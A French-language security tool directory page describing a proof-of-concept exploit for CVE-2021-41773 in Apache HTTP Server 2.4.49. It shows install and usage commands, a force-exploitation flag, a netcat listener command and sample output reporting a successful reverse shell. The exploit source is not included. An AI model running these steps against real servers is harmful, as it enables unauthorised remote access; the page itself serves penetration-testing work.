Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/adrianmafandy/cve-2021-41773
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubadrianmafandy/cve-2021-41773

CVE-2021-41773

Exploit de preuve de concept pour CVE-2021-41773, une vulnérabilité de traversée de chemin et d'exécution de code à distance dans Apache HTTP Server 2.4.49. Automatise la vérification de la vulnérabilité et la livraison de la charge utile du reverse shell.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1il y a 9 moisPas encore vérifié

CVE-2021-41773 - Apache HTTP Server 2.4.49 Path Traversal & RCE

Security Platform Language

📖 Description

Ceci est un exploit de preuve de concept pour CVE-2021-41773, une vulnérabilité de traversée de chemin et d'exécution de code à distance dans Apache HTTP Server 2.4.49.

Détails de la vulnérabilité

  • CVE: CVE-2021-41773
  • Version affectée : Apache HTTP Server 2.4.49
  • Type de vulnérabilité : Path Traversal → Exécution de code à distance

🚀 Utilisation

Installation

root@kitploit:~
git clone https://github.com/adrianmafandy/CVE-2021-41773
cd CVE-2021-41773
pip install requests

Utilisation de base

root@kitploit:~
# Basic syntax
python3 exploit.py -t <TARGET-URL> -lh <LHOST> -lp <LPORT>

# Force exploitation even if vulnerability check fails
python3 exploit.py -t <TARGET-URL> -lh <LHOST> -lp <LPORT> -f

Exemple

root@kitploit:~
# Basic syntax
python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337

# Force exploitation even if vulnerability check fails
python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337 -f

Configuration de l'écouteur

Avant d'exécuter l'exploit, configurez un écouteur netcat :

root@kitploit:~
nc -lvnp 4444

Résultat attendu

root@kitploit:~
$ python3 exploit.py -t 192.168.1.100 -lh 10.0.0.5 -lp 1337

     ______
    (_____ \
     _____) ) _ _ ____   ____ ___   ____
    |  ____/ | | |  _ \ / ___) _ \ / _  |
    | |    | | | | | | | |  | |_| ( (_| |
    |_|     \___/|_| |_|_|   \___/ \___ |
                                  (_____|

       Apache2 2.4.49 - CVE-2021-41773

   
[*] Checking if target is vulnerable...
[+] Target is VULNERABLE!
[*] Executing reverse shell payload...
[+] Reverse shell payload executed successfully!
[*] Check your listener
Télécharger l’outil